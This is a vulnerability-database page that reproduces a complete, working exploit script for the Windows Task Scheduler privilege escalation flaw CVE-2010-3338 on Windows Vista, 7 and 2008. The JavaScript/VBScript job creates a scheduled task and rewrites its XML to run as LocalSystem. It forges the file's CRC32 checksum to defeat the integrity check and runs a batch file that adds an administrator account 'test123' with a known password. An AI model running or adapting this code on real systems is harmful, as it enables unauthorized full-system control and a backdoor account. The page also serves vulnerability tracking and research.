Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Windows Task Scheduler Privilege Escalation 0day (CVE-2010-3338)

🗓️ 01 Jul 2014 00:00:00Reported by RootType 
seebug
 seebug🔗 www.seebug.org👁 36 Views

Windows Task Scheduler Privilege Escalation 0day (CVE-2010-3338) by webDEViL on Windows 7/2008 x86/x6

Related
Code
ReporterTitlePublishedViews
Family
0day.today		Windows Escalate Task Scheduler XML Privilege Escalation
21 Jul 201200:00
zdt
Circl		CVE-2010-3338
20 Nov 201000:00
circl
CVE		CVE-2010-3338
16 Dec 201019:00
cve
Cvelist		CVE-2010-3338
16 Dec 201019:00
cvelist
Exploit DB		Microsoft Windows - Task Scheduler '.XML' Local Privilege Escalation (MS10-092) (Metasploit)
19 Jul 201200:00
exploitdb
Metasploit		Windows Escalate Task Scheduler XML Privilege Escalation
13 Jun 201205:58
metasploit
NVD		CVE-2010-3338
16 Dec 201019:33
nvd
OpenVAS		Microsoft Windows Task Scheduler Elevation of Privilege Vulnerability (2305420)
15 Dec 201000:00
openvas
OpenVAS		Microsoft Windows Task Scheduler Elevation of Privilege Vulnerability (2305420)
15 Dec 201000:00
openvas
Packet Storm		Windows Escalate Task Scheduler XML Privilege Escalation
19 Jul 201200:00
packetstorm
Rows per page

                                                # Exploit Title: Windows Task Scheduler Privilege Escalation 0day
# Date: 20-11-2010
# Author: webDEViL
# Tested on: Windows 7/2008 x86/x64
 
 
<job id="tasksch-wD-0day">
<script language="Javascript">
 
crc_table = new Array(
  0x00000000, 0x77073096, 0xEE0E612C, 0x990951BA, 0x076DC419,
  0x706AF48F, 0xE963A535, 0x9E6495A3, 0x0EDB8832, 0x79DCB8A4,
  0xE0D5E91E, 0x97D2D988, 0x09B64C2B, 0x7EB17CBD, 0xE7B82D07,
  0x90BF1D91, 0x1DB71064, 0x6AB020F2, 0xF3B97148, 0x84BE41DE,
  0x1ADAD47D, 0x6DDDE4EB, 0xF4D4B551, 0x83D385C7, 0x136C9856,
  0x646BA8C0, 0xFD62F97A, 0x8A65C9EC, 0x14015C4F, 0x63066CD9,
  0xFA0F3D63, 0x8D080DF5, 0x3B6E20C8, 0x4C69105E, 0xD56041E4,
  0xA2677172, 0x3C03E4D1, 0x4B04D447, 0xD20D85FD, 0xA50AB56B,
  0x35B5A8FA, 0x42B2986C, 0xDBBBC9D6, 0xACBCF940, 0x32D86CE3,
  0x45DF5C75, 0xDCD60DCF, 0xABD13D59, 0x26D930AC, 0x51DE003A,
  0xC8D75180, 0xBFD06116, 0x21B4F4B5, 0x56B3C423, 0xCFBA9599,
  0xB8BDA50F, 0x2802B89E, 0x5F058808, 0xC60CD9B2, 0xB10BE924,
  0x2F6F7C87, 0x58684C11, 0xC1611DAB, 0xB6662D3D, 0x76DC4190,
  0x01DB7106, 0x98D220BC, 0xEFD5102A, 0x71B18589, 0x06B6B51F,
  0x9FBFE4A5, 0xE8B8D433, 0x7807C9A2, 0x0F00F934, 0x9609A88E,
  0xE10E9818, 0x7F6A0DBB, 0x086D3D2D, 0x91646C97, 0xE6635C01,
  0x6B6B51F4, 0x1C6C6162, 0x856530D8, 0xF262004E, 0x6C0695ED,
  0x1B01A57B, 0x8208F4C1, 0xF50FC457, 0x65B0D9C6, 0x12B7E950,
  0x8BBEB8EA, 0xFCB9887C, 0x62DD1DDF, 0x15DA2D49, 0x8CD37CF3,
  0xFBD44C65, 0x4DB26158, 0x3AB551CE, 0xA3BC0074, 0xD4BB30E2,
  0x4ADFA541, 0x3DD895D7, 0xA4D1C46D, 0xD3D6F4FB, 0x4369E96A,
  0x346ED9FC, 0xAD678846, 0xDA60B8D0, 0x44042D73, 0x33031DE5,
  0xAA0A4C5F, 0xDD0D7CC9, 0x5005713C, 0x270241AA, 0xBE0B1010,
  0xC90C2086, 0x5768B525, 0x206F85B3, 0xB966D409, 0xCE61E49F,
  0x5EDEF90E, 0x29D9C998, 0xB0D09822, 0xC7D7A8B4, 0x59B33D17,
  0x2EB40D81, 0xB7BD5C3B, 0xC0BA6CAD, 0xEDB88320, 0x9ABFB3B6,
  0x03B6E20C, 0x74B1D29A, 0xEAD54739, 0x9DD277AF, 0x04DB2615,
  0x73DC1683, 0xE3630B12, 0x94643B84, 0x0D6D6A3E, 0x7A6A5AA8,
  0xE40ECF0B, 0x9309FF9D, 0x0A00AE27, 0x7D079EB1, 0xF00F9344,
  0x8708A3D2, 0x1E01F268, 0x6906C2FE, 0xF762575D, 0x806567CB,
  0x196C3671, 0x6E6B06E7, 0xFED41B76, 0x89D32BE0, 0x10DA7A5A,
  0x67DD4ACC, 0xF9B9DF6F, 0x8EBEEFF9, 0x17B7BE43, 0x60B08ED5,
  0xD6D6A3E8, 0xA1D1937E, 0x38D8C2C4, 0x4FDFF252, 0xD1BB67F1,
  0xA6BC5767, 0x3FB506DD, 0x48B2364B, 0xD80D2BDA, 0xAF0A1B4C,
  0x36034AF6, 0x41047A60, 0xDF60EFC3, 0xA867DF55, 0x316E8EEF,
  0x4669BE79, 0xCB61B38C, 0xBC66831A, 0x256FD2A0, 0x5268E236,
  0xCC0C7795, 0xBB0B4703, 0x220216B9, 0x5505262F, 0xC5BA3BBE,
  0xB2BD0B28, 0x2BB45A92, 0x5CB36A04, 0xC2D7FFA7, 0xB5D0CF31,
  0x2CD99E8B, 0x5BDEAE1D, 0x9B64C2B0, 0xEC63F226, 0x756AA39C,
  0x026D930A, 0x9C0906A9, 0xEB0E363F, 0x72076785, 0x05005713,
  0x95BF4A82, 0xE2B87A14, 0x7BB12BAE, 0x0CB61B38, 0x92D28E9B,
  0xE5D5BE0D, 0x7CDCEFB7, 0x0BDBDF21, 0x86D3D2D4, 0xF1D4E242,
  0x68DDB3F8, 0x1FDA836E, 0x81BE16CD, 0xF6B9265B, 0x6FB077E1,
  0x18B74777, 0x88085AE6, 0xFF0F6A70, 0x66063BCA, 0x11010B5C,
  0x8F659EFF, 0xF862AE69, 0x616BFFD3, 0x166CCF45, 0xA00AE278,
  0xD70DD2EE, 0x4E048354, 0x3903B3C2, 0xA7672661, 0xD06016F7,
  0x4969474D, 0x3E6E77DB, 0xAED16A4A, 0xD9D65ADC, 0x40DF0B66,
  0x37D83BF0, 0xA9BCAE53, 0xDEBB9EC5, 0x47B2CF7F, 0x30B5FFE9,
  0xBDBDF21C, 0xCABAC28A, 0x53B39330, 0x24B4A3A6, 0xBAD03605,
  0xCDD70693, 0x54DE5729, 0x23D967BF, 0xB3667A2E, 0xC4614AB8,
  0x5D681B02, 0x2A6F2B94, 0xB40BBE37, 0xC30C8EA1, 0x5A05DF1B,
  0x2D02EF8D
);
 
var hD='0123456789ABCDEF';
 
function dec2hex(d) {
h='';
for (i=0;i<8;i++) {
h = hD.charAt(d&15)+h;
d >>>= 4;
}
return h;
}
function encodeToHex(str){
    var r="";
    var e=str.length;
    var c=0;
    var h;
    while(c<e){
        h=str.charCodeAt(c++).toString(16);
        while(h.length<3) h="0"+h;
        r+=h;
    }
    return r;
}
function decodeFromHex(str){
    var r="";
    var e=str.length;
    var s=0;
    while(e>1){
         
        r=r+String.fromCharCode("0x"+str.substring(s,s+2));
         
        s=s+2;
        e=e-2;
    }
     
    return r;
     
}
 
 
function calc_crc(anyForm) {
 
anyTextString=decodeFromHex(anyForm);
 
Crc_value = 0xFFFFFFFF;
StringLength=anyTextString.length;
for (i=0; i<StringLength; i++) {
tableIndex = (anyTextString.charCodeAt(i) ^ Crc_value) & 0xFF;
Table_value = crc_table[tableIndex];
Crc_value >>>= 8;
Crc_value ^= Table_value;
}
Crc_value ^= 0xFFFFFFFF;
return dec2hex(Crc_value);
 
}
 
function rev_crc(leadString,endString,crc32) {
//
// First, we calculate the CRC-32 for the initial string
//
    anyTextString=decodeFromHex(leadString);
     
   Crc_value = 0xFFFFFFFF;
   StringLength=anyTextString.length;
   //document.write(alert(StringLength));
   for (var i=0; i<StringLength; i++) {
      tableIndex = (anyTextString.charCodeAt(i) ^ Crc_value) & 0xFF;
      Table_value = crc_table[tableIndex];
      Crc_value >>>= 8;
      Crc_value ^= Table_value;
   }
//
// Second, we calculate the CRC-32 without the final string
//
   crc=parseInt(crc32,16);
   crc ^= 0xFFFFFFFF;
   anyTextString=decodeFromHex(endString);
   StringLength=anyTextString.length;
   for (var i=0; i<StringLength; i++) {
      tableIndex=0;
      Table_value = crc_table[tableIndex];
      while (((Table_value ^ crc) >>> 24)  & 0xFF) {
         tableIndex++;
         Table_value = crc_table[tableIndex];
      }
      crc ^= Table_value;
      crc <<= 8;
      crc |= tableIndex ^ anyTextString.charCodeAt(StringLength - i -1);
   }
//
// Now let's find the 4-byte string
//
   for (var i=0; i<4; i++) {
      tableIndex=0;
      Table_value = crc_table[tableIndex];
      while (((Table_value ^ crc) >>> 24)  & 0xFF) {
         tableIndex++;
         Table_value = crc_table[tableIndex];
      }
      crc ^= Table_value;
      crc <<= 8;
      crc |= tableIndex;
   }
   crc ^= Crc_value;
//
// Finally, display the results
//
   var TextString=dec2hex(crc);
   var Teststring='';
Teststring=TextString.substring(6,8);
Teststring+=TextString.substring(4,6);
Teststring+=TextString.substring(2,4);
Teststring+=TextString.substring(0,2);
   return Teststring
}
function decodeFromHex(str){
    var r="";
    var e=str.length;
    var s=0;
    while(e>1){
         
        r=r+String.fromCharCode("0x"+str.substring(s,s+2));
         
        s=s+2;
        e=e-2;
    }
     
    return r;
     
}
</script>
 
 
 
<script language="VBScript">
dim output
set output = wscript.stdout
output.writeline " Task Scheduler 0 day - Privilege Escalation "
output.writeline " Should work on Vista/Win7/2008 x86/x64"
output.writeline " webDEViL - w3bd3vil [at] gmail [dot] com" & vbCr & vbLf
biatchFile = WScript.CreateObject("Scripting.FileSystemObject").GetSpecialFolder(2)+"\xpl.bat"
Set objShell = CreateObject("WScript.Shell")
objShell.Run "schtasks /create /TN wDw00t /sc monthly /tr """+biatchFile+"""",,True
 
Set fso = CreateObject("Scripting.FileSystemObject")
Set a = fso.CreateTextFile(biatchFile, True)
a.WriteLine ("net user /add test123 test123")
a.WriteLine ("net localgroup administrators /add test123")
a.WriteLine ("schtasks /delete /f /TN wDw00t")
 
Function ReadByteArray(strFileName)
Const adTypeBinary = 1
Dim bin
    Set bin = CreateObject("ADODB.Stream")
    bin.Type = adTypeBinary
    bin.Open
    bin.LoadFromFile strFileName
    ReadByteArray = bin.Read
'output.writeline ReadByteArray
End Function
 
Function OctetToHexStr (arrbytOctet)
 Dim k
 OctetToHexStr = ""
 For k = 3 To Lenb (arrbytOctet)
  OctetToHexStr = OctetToHexStr _
        & Right("0" & Hex(Ascb(Midb(arrbytOctet, k, 1))), 2)
 Next
 End Function
strFileName="C:\windows\system32\tasks\wDw00t"
 
hexXML = OctetToHexStr (ReadByteArray(strFileName))
'output.writeline hexXML
crc32 = calc_crc(hexXML)
output.writeline "Crc32 Original: "+crc32
 
 
Set xmlDoc = CreateObject("Microsoft.XMLDOM")
'permissions workaround
'objShell.Run "cmd /c copy C:\windows\system32\tasks\wDw00t .",,True
'objShell.Run "cmd /c schtasks /query /XML /TN wDw00t > wDw00t.xml",,True
Set objShell = WScript.CreateObject("WScript.Shell")
Set objExecObject = objShell.Exec("cmd /c schtasks /query /XML /TN wDw00t")
 
Do Until objExecObject.StdOut.AtEndOfStream
 strLine = strLine & objExecObject.StdOut.ReadLine()
Loop
hexXML = "FFFE3C00"+OctetToHexStr(strLine)
'output.writeline hexXML
Set ts = fso.createtextfile ("wDw00t.xml")
For n = 1 To (Len (hexXML) - 1) step 2
 ts.write Chr ("&h" & Mid (hexXML, n, 2))
Next
ts.close
 
xmlDoc.load "wDw00t.xml"
Set Author = xmlDoc.selectsinglenode ("//Task/RegistrationInfo/Author")
Author.text = "LocalSystem"
Set UserId = xmlDoc.selectsinglenode ("//Task/Principals/Principal/UserId")
UserId.text = "S-1-5-18"
xmldoc.save(strFileName)
 
hexXML = OctetToHexStr (ReadByteArray(strFileName))
 
leadString=hexXML+"3C0021002D002D00"
endString="2D002D003E00"
'output.writeline leadString
impbytes=rev_crc(leadString,endString,crc32)
output.writeline "Crc32 Magic Bytes: "+impbytes
 
finalString = leadString+impbytes+endString
forge = calc_crc(finalString)
output.writeline "Crc32 Forged: "+forge
 
strHexString="FFFE"+finalString
Set fso = CreateObject ("scripting.filesystemobject")
Set stream = CreateObject ("adodb.stream")
 
Set ts = fso.createtextfile (strFileName)
 
For n = 1 To (Len (strHexString) - 1) step 2
 ts.write Chr ("&h" & Mid (strHexString, n, 2))
Next
ts.close
 
 
Set objShell = CreateObject("WScript.Shell")
objShell.Run "schtasks /change /TN wDw00t /disable",,True
objShell.Run "schtasks /change /TN wDw00t /enable",,True
objShell.Run "schtasks /run /TN wDw00t",,True
 
</script>
</job>

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
01 Jul 2014 00:00Current
6.5Medium risk
Vulners AI Score6.5
EPSS0.6037
privilege escalationcve-2010-3338webdevilwindows 7/2008x86/x64javascriptexploit
36